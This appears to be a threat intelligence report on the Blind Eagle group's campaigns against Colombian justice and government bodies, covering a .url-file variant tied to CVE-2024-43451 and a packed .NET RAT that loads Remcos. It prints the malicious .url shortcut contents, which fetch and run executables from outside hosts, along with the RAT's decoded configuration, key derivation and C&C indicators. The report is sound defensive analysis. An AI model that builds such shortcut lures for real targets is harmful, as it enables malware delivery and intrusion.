`.urlfiles, which cause a similar effect to the` `.urlvariant in its attack arsenal and campaigns.`
**APT-C-36**, also known as **Blind Eagle**, is a threat group that engages in both **espionage and cybercrime**. It primarily targets organizations in **Colombia** and other **Latin American countries**. Active since **2018**, this **Advanced Persistent Threat (APT)** group focuses on **government institutions, financial organizations, and critical infrastructure**.
Blind Eagle is known for employing **sophisticated social engineering tactics**, using **phishing emails** with **malicious attachments or links** to gain initial access to target systems. Their malware arsenal includes **commodity Remote Access Trojans (RATs)** such as **NjRAT**, **AsyncRAT**, and **Remcos**.
Our research revealed that the group recently expanded its toolkit with additional commodity malware. To protect their malicious executables, Blind Eagle utilizes the **Packer-as-a-Service HeartCrypt**, which they use to pack a **.NET RAT** that appears to be a variant of **PureCrypter**. **Remcos RAT** remains the final payload.
On **November 12, 2024**, **Microsoft** patched a newly discovered vulnerability, **CVE-2024-43451**. This vulnerability was actively **exploited in the wild** using `.url` files containing **malicious code**, which could be triggered through **unusual user actions** such as **right-clicking the file**, **deleting it**, or performing a **drag-and-drop operation**. Exploited as a **zero-day**, it was used in attacks targeting **Ukraine.** According to **CERT-UA**, the campaign was attributed to the threat actor **UAC-0194**, suspected to be **Russian-affiliated**.
Six days after Microsoft released the patch, **Blind Eagle** included a variant of this exploit in its attack arsenal and campaigns. While this variant does not actually expose the NTLMv2 hash, it notifies the threat actors that the file was downloaded by the same unusual user-file interactions. On devices vulnerable to **CVE-2024-43451**, a **WebDAV request** is triggered even before the user manually interacts with the file with the same unusual behavior. Meanwhile, on both patched and unpatched systems, manually clicking the malicious `.url` file initiates the download and execution of the next-stage payload. After incorporating this file into their campaigns, the group targeted mainly Colombian public and private organizations, with high infection rates. More than **1600** victims were infected during a campaign that occurred around December 19, 2024. Considering Blind Eagle’s targeted APT approach, this infection rate is significant.
**CVE-2024-43451** is a vulnerability that exposes a user’s NTLMv2 hash, which can allow an attacker to authenticate as the user via pass-the-hash or relay attacks. If the compromised account has high privileges and proper mitigations (such as SMB signing and NTLM relay protections) that are not enforced, this could lead to lateral movement, privilege escalation, or even full domain compromise. Eventually, the user, by manually clicking, creates an SMB connection through port 445, which downloads and executes the malicious payload. The exploit reported by CERT-UA:
“`
[InternetShortcut] URL=file://92.42[.]96[.]30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe IconIndex=1 HotKey=0 IDList= IconFile=C:\Windows\System32\SHELL32.dll [{009862A0-0000-0000-C000-000000005986}] Prop3=19,9 [{000214A0-0000-0000-C000-000000000046}] [InternetShortcut.A] [InternetShortcut.W] URL=file://92.42[.]96[.]30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe
“`
**CVE-2024-43451** affects all supported Windows versions, and it is triggered in uncommon ways:
The `.url` file below, used by Blind Eagle against Colombian institutions, is a variant of this CVE, but without the exploiting part, meaning it does not expose the NTLMv2 hash. When manually clicked by the user, this file also downloads malicious files, but instead of using **SMB** (port: 445), it uses HTTP. When a URL is in UNC Path format, it first attempts an SMB connection, and if this is unavailable, it attempts WebDAV. However, once the port is specified, which in this case is `@80`, the **SMB** attempt is avoided, and the connection is made directly over **HTTP** with the **User-Agent** `Microsoft-WebDAV-MiniRedir/10.0.19044`.
“`
[{009862A0-0000-0000-C000-000000005986}] Prop3=19,2 [InternetShortcut] IconIndex=11 IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe IDList= URL=file://\\62.60[.]226[.]64@80\file\4025_3980.exe HotKey=0
“`
While this variant does not directly exploit the vulnerability, it exhibits unusual behavior by communicating with the server without requiring manual user interaction. However, for the `.url` file to download the next-stage payload, the user must manually click it, which triggers a WebDAV request over port 80.
This variant serves as a valuable tool for threat actors, as it notifies them when a targeted user downloads the malicious `.url` file. Even if the user does not directly execute the file, Blind Eagle can still detect the interaction, providing insight into potential targets.
Since Microsoft patched this vulnerability, this unusual behavior no longer occurs. However, manual user interaction can still trigger the download and execution of the malicious payload.
Microsoft published this vulnerability on November 12, 2024. On November 18, we observed the first crafted payload. This `.url` file infected both patched and unpatched machines. Since then, we observed multiple campaigns targeting Colombia, and the dropped payload was a .NET RAT that downloads the final stage from **GitHub** or **BitBucket**, a **Remcos RAT**. However, to this day, most of those `.url` files are not detected by any Anti-Virus engine on VirusTotal.
These ongoing campaigns, based on filenames, appear to primarily target various **Colombian government organizations**, including the Justice System. These are some of the malicious `.url` filenames:
“`
[Filename] – Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de CONTINUACIÓN JUICIO ORAL REFERENCIA.url [English] – “Courts of sentence execution in Bogotá with knowledge function scheduled a hearing for the continuation of the oral trial in reference.” [Filename] NOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url [English] – “Notification of hearing for the taking of samples involving the defendant.” [Filename] – QUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales de Bogotá.url [English] – “Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of Bogotá.” [Filename] – este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot.url [English] – “This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogotá.” [Filename] – en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Seguridad.url [English] – “By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measures.” [Filename] – COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE.url [English] – “Communication No. 00239948 issued Criminal 00028483 November 28 / Official Letter No. 00239948 issued Criminal 00028483 November 28.” [Filename] – Oficio Tutelar 0439594 – Proceso N° 03948939-002024.url [English] – “Protective Order 0439594 – Case No. 03948939-002024.”
“`
While operating with the specific malicious file for over two months, the APT group has changed approximately more than ten different C&Cs (Command and Control Servers) for its final stage payload. The attack chain has some small variations, but the `.url` files are always part of the campaign during the initial stage.
During the campaigns that took place around January 21 and 22, 2025, the APT group distributed multiple `.url` files via email through possibly compromised Google Drive accounts.
The specified file icon in the `.url` file is equivalent to the one from the Edge browser. Many of the endpoints contacted by the `.url` contain multiple malicious files, though we can not attribute all files hosted on those servers to **Blind Eagle**.
“`
[{009862A0-0000-0000-C000-000000005986}] Prop3=19,2 [InternetShortcut] IconIndex=11 IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe IDList= URL=file://\\62.60.226[.]64@80\file\3819_5987.exe HotKey=0
“`
The downloaded executable appears to be packed using the Packer as a Service **HeartCrypt**. This later injects into `csc.exe` a .NET executable responsible for unpacking and executing in memory a .NET RAT, which appears to be a variant of **PureCrypter**. This .NET RAT retrieves various user and machine information such as 1) Username, 2) OS Version, 3) Process name and architecture, 4) Antivirus installed, and other machine specs. After it decrypted its configuration, which is embedded as a resource, we observed the campaign ID `socialismo` and the C&C which communicates. The C&C `republicadominica2025[.]ip-ddns[.]com`, after it received the user data, responded with a URL to download and execute the next stage payload. The final stage is downloaded from the GitHub repository `Oscarito20222/file`, and the malware is the known Remote Access Trojan **Remcos RAT** with C&C `elyeso.ip-ddns[.]com:30204` and Botnet name `redtube`.
Both of the domain names from the .NET RAT and the Remcos RAT resolve to the same IP address `177.255.85[.]101`. The group has used this IP for multiple Remcos C&Cs through January & February campaigns:
“`
amuntgroupfree.ip-ddns[.]com donato.con-ip[.]com elyeso.ip-ddns[.]com comina998.ddns-ip[.]net republicadominica2025.ip-ddns[.]com
“`
It is worth mentioning that the attacker’s GitHub repository is used in multiple Blind Eagle campaigns to deliver the final stage payload, **Remcos.** This repository is constantly updated with new files that communicate with the latest C&C. All the repository updates were committed in the timezone `-0500`, which could possibly indicate Blind Eagle’s country of origin aligns with South American countries. Examples of commits:
“`
================================================== [2025-02-04T20:00:59Z] Author: Oscarito20222 tree 62c86b52fabaaecc398b902965e58c4154edc427 parent a84f5a384b090598cd29be6b2492cbb45c73c3ac author Oscarito20222 1738699259 -0500 committer GitHub 1738699259 -0500 Add files via upload * fuck.exe – 3bd90557615ef95e4244bdbaa8e0e7fd949cdd3a * redtube.exe – 758c73ab9706ae6977f9b4601c20b3667836d3ef * roma.exe – ba95ea1dcc744566a9552d9665feff035925a5c5 ================================================== [2025-02-06T15:51:50Z] Author: Oscarito20222 tree 220a606655d64d03762d319c5f5b80038e5bc13c parent 29335b62acef53cb7076f81b8fa25e9baf6d9994 author Oscarito20222 1738857110 -0500 committer GitHub 1738857110 -0500 Delete roma.exe ================================================== [2025-02-06T15:52:02Z] Author: Oscarito20222 tree e9e56beee7cf526a4df97e35f2df9458cae0ec23 parent b7f7fe7ce6d5eb7453ca5edd616bc9f071cd3ea5 author Oscarito20222 1738857122 -0500 committer GitHub 1738857122 -0500 Delete redtube.exe ================================================== [2025-02-06T15:52:11Z] Author: Oscarito20222 tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904 parent d2279dc66302d8afad41c82ad81d0733e1f2273d author Oscarito20222 1738857131 -0500 committer GitHub 1738857131 -0500 Delete fuck.exe ================================================== [2025-02-06T15:52:33Z] Author: Oscarito20222 tree 5d1edc470b4b33a31f982077e08b2e61f438feab parent a7b74e834eddb6eb9a23a268c7088b3aeba493d4 author Oscarito20222 1738857153 -0500 committer GitHub 1738857153 -0500 Add files via upload * normales.exe – 3d3248ad14dce8b6fcf416d56d8de52b07b549e7
“`
The **GitHub account** also contains another repository named `diciembre`, which includes an archive with a `.vbs` file. Notably, this **commit from two years ago** was made in the same **UTC-5 timezone** as the recent activity.
This repository, which was “untouched” for over two years, was updated on February 25, 2025, and introduced a new **Remcos RAT** with C&C `21ene.ip-ddns[.]com:30204`.
Although similar to the previous campaign, this one leveraged **Bitbucket** instead of **GitHub** as the final-stage distribution platform.
In these campaigns, two Bitbucket repositories were abused and contained **Remcos RAT** executable files, which were uploaded to **Bitbucket** around **December 2024**. Considering this APT group’s activity and approach, a significant number of victims ultimately downloaded these malicious executables.
The `PARAISO` campaign was very successful, infecting more than **1600** victims with **Remcos RAT** and C&C `newstaticfreepoint24.ddns-ip.net:3020`. The total infections across those campaigns, which occurred for over a week, were approximately **9,000**.
Since adding this file to its arsenal, **Blind Eagle** consistently targeted **Colombia**, primarily focusing on **justice and other government organizations**. The group sent emails with malicious Google Drive links containing either an archive or the actual `.url`. Those files triggered WebDAV requests on unpatched machines and, once clicked by the user, resulted in a WebDAV request that downloaded a **HeartCrypt**-packed malware. This malware then extracted and injected a packed .NET loader into `csc.exe`, which later loaded a .NET RAT which appears to be a variant of **PureCrypter**. This .NET RAT decrypted its configuration, which contains execution parameters such as the C&C server and the campaign ID. After sending encrypted user data, the malware receives a URL to download the final stage payload, **Remcos RAT**. Those final payloads were initially hosted on compromised servers and later on **GitHub** or **Bitbucket**.
Throughout multiple campaigns, the group registered different domain names for its C&C servers, even though they were hosted on the same IP address. During campaigns such as `socialismo`, the C&C of the .NET RAT was `republicadominica2025[.]ip-ddns[.]com` and for the final stage `elyeso.ip-ddns[.]com`, but both of them resolved to the same IP `177[.]255.85[.]101`.
**Check Point Research** was closely monitoring **Blind Eagle** activities, we discovered an operation failure in which the group revealed its past phishing activities together with the victim’s Personally Identifiable Information ( **PII**).
During January and February, the APT group delivered the last stage payload via files uploaded to the `Oscarito20222/file` repository. The account `Oscarito20222` also had another repository, which had only one commit from two years ago, `Oscarito20222/diciembre`.
On February 25, 2025, this changed. The repository `diciembre` received updates and also began delivering **Remcos** during the next campaigns. To understand why this shift occurred, we had to examine the **previous repository** responsible for delivering the final payload in the attack chain.
`Oscarito20222/file` final commits:
“`
================================================== [2025-02-25T14:01:33Z] Author: Oscarito20222 tree f03354f986a1398d1b471c0af75b404474cf94f7 parent 9653938c6fd4b347209d87923f3617d70a3c12e2 author Oscarito20222 1740492093 -0500 committer GitHub 1740492093 -0500 Add files via upload * Ver Datos del Formulario.html – e0837aebd649dba01bc4d594ef21a8086edaaeeb ================================================== [2025-02-25T15:27:01Z] Author: Oscarito20222 tree 63a5c5307b93e0393aba14b42d7915ab7a2733ef parent 12eacb556eee889a16beb2fe9449748ebb4e33b0 author Oscarito20222 1740497221 -0500 committer GitHub 1740497221 -0500 Delete Ver Datos del Formulario.html
“`
For approximately **1 hour and 27 minutes**, the group uploaded an HTML file named `Ver Datos del Formulario.html`, which was later deleted. As of now, this remains the last recorded action in the repository, which occurred on **February 25, 2025, at 15:27 UTC**.
At this point, **Blind Eagle** resumed its activity, using the repository `Oscarito20222/diciembre`, with the first commit taking place at **17:39 UTC the same day:**
“`
================================================== [2022-12-21T17:31:25Z] Author: Oscarito20222 tree 67eb4f5d839ca89b28203a27ce3ca74029b93b7c author Oscarito20222 1671643885 -0500 committer GitHub 1671643885 -0500 Add files via upload * 2112-2.7z – 4e3cb251fb98a47c2f5dec5f3722723990c17a49 ================================================== [2025-02-25T17:39:17Z] Author: Oscarito20222 tree 1b6fc5c2150d598472f892a88305545626d977bd parent de2b332d06251e6449760ceead598a56da637daa author Oscarito20222 1740505157 -0500 committer GitHub 1740505157 -0500 Add files via upload * sena.exe – abf71fd332b760da29aa211f4aaa1661860a98c6 ================================================== [2025-02-25T17:39:29Z] Author: Oscarito20222 tree 3262538dbe881b34cfd71cedcb27e03688573f0e parent 408d7ef19b151668e2445532e06c6b3a569ebf98 author Oscarito20222 1740505169 -0500 committer GitHub 1740505169 -0500 Delete 2112-2.7z ================================================== [2025-02-26T15:07:11Z] Author: Oscarito20222 tree d119d827561c0796c50deb8cf69f324811479e88 parent d645bd6c880358d2bb4dfd83252ebbb6156c6b5c author Oscarito20222 1740582431 -0500 committer GitHub 1740582431 -0500 Add files via upload * TobaccoAnnouncement.exe – 44182ce5a8fadef41064d7c0266e8f99015262b0
“`
Opfail Timeline:
`Oscarito20222/fileHTML PII data from phishing activities.` `21ene.ip-ddns[.]comto` `Oscarito20222/diciembrerepository` `Oscarito20222/diciembrethat was uploaded approximately two years ago.`
**Check Point Research** obtained this HTML file, which was linked to phishing activities from early March 2024. The phishing domain `servicioseguroenlineabb[.]com` appears to have impersonated Colombian Banks.
The PII data contains four fields:
The dataset (Referred to as: **“Datos del Formulario”**) contained **over 8,400 entries**, with **8,075** valid after filtering out empty or insufficient records. These valid entries included **account-password pairs** (username or email or all data filled), with **1,634 email addresses** identified.
The phishing campaign specifically targeted **Colombian users**. Among the collected email addresses:
The **.NET RAT** delivered during the malware campaigns is protected with HeartCrypt, a Packer-as-a-Service (PaaS) that emerged in early 2024 to obfuscate malware and evade detection by security software. This packer embeds malicious code into otherwise legitimate binaries, with the packed payload stored as a resource. When executed, HeartCrypt first unpacks a simple .NET packer, which is injected into and triggered within `csc.exe`.
This **.NET packer** contains an embedded buffer that is:
In addition, the final executable (.NET RAT assembly) is obfuscated with **NET-Reactor**, applying both **string encryption** and **control flow obfuscation** to further hinder analysis.
The majority of the strings are encrypted and stored inside a resource, which is immediately decrypted when execution begins. Then, each time a specific string is required, the malware requests it based on the index ID, where the index points to the **DWORD** size of the string followed by the string content. The decrypted variable (containing the decrypted strings resource) follows the structure of how strings are stored in the `#US` stream in .NET binaries. NETReactorSlayer (a well-known open-source deobfuscator for NET-Reactor-protected binaries) is able to decrypt those strings and deobfuscate such binaries.
The decrypted resource contains a base64 string, which is deserialized and contains the malware configuration along with the C&C.
“`
CmIKIXJlcHVibGljYWRvbWluaWNhMjAyNS5pcC1kZG5zLmNvbRD56wEYBSIIbW9ubzEyMzQyCnNvY2lhbGlzbW9CElNwb25zb3JzaGlwVGltZW91dGINTmV4dEFjdGl2YXRvcg== { “1”: { “1”: “republicadominica2025[.]ip-ddns[.]com”, “2”: 30201, “3”: 5, “4”: “mono1234”, “6”: “socialismo”, “8”: “SponsorshipTimeout”, “12”: “NextActivator” } }
“`
The malware collects information regarding the execution, machine, and user, then serializes them using **protobuf** and encrypts them using AES. Data sent to the C&C:
`socialismo` `0.3.9`
The malware attempts to retrieve IP addresses from the C&C domain name ( `GetHostAddresses`) and, if successful, sends the collected information.
Data is serialized, and machine information is sent along with the malware campaign `socialismo` and version `0.3.9`.
The AES key used to encrypt and decrypt network communications is derived by calling `Rfc2898DeriveBytes` using as a password the mutex name `mono1234` and salt `{ 1, 2, 23, 234, 37, 48, 134, 63, 248, 4 }`.
A similar process then retrieves the response from the C&C server, which responds with a buffer containing the DWORD size followed by the AES encrypted buffer. At this moment, Blind Eagle has utilized this RAT as a downloader, receiving a URL with the file being downloaded and injected either into `MSBuild.exe` or `InstallUtil.exe`.
Even though **Blind Eagle** uses this command the most, utilizing this .NET RAT as a simple downloader, the malware also contains other functionalities, such as downloading the next payload on disk, maintaining persistence via scheduled tasks, or even executing PowerShell scripts.
Blind Eagle remains one of the most active and dangerous threat actors in Latin America, with a particular focus on Colombia’s public and private sectors. The group’s scale and persistence are evident, with over **1,600** infections recorded from a single campaign. Long suspected of originating in Latin America, the confirmation of its **UTC-5** operating timezone further narrows its likely base of operations to several **South American** countries.
Despite Microsoft’s release of a patch for **CVE-2024-43451** on **November 12, 2024**, Blind Eagle quickly adapted, introducing a variant of the “exploit” in just **six days**. This rapid response highlights the group’s technical expertise, adaptability, and relentless pursuit of new attack methods. By incorporating malicious `.url` files into its arsenal, Blind Eagle continues to refine its tactics, ensuring its malware distribution remains effective against evolving security defenses.
A key factor in its success is its ability to exploit legitimate file-sharing platforms, including **Google Drive**, **Dropbox**, **Bitbucket**, and **GitHub**, allowing it to bypass traditional security measures and distribute malware stealthily. Additionally, its use of underground crimeware tools such as **Remcos RAT**, **HeartCrypt**, and **PureCrypter** reinforces its deep ties to the cybercriminal ecosystem, granting access to sophisticated evasion techniques and persistent access methods.
Blind Eagle’s rapid evolution, effective social engineering tactics, and focus on both public and private sector entities make it a critical cybersecurity threat. Mitigating its impact requires proactive threat intelligence, advanced security defenses, and continuous monitoring. Organizations must remain vigilant against phishing campaigns, file-based malware delivery, and unconventional attack techniques to stay ahead of this ever-adapting adversary.
Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and operating systems and protect against the attacks and threats described in this report.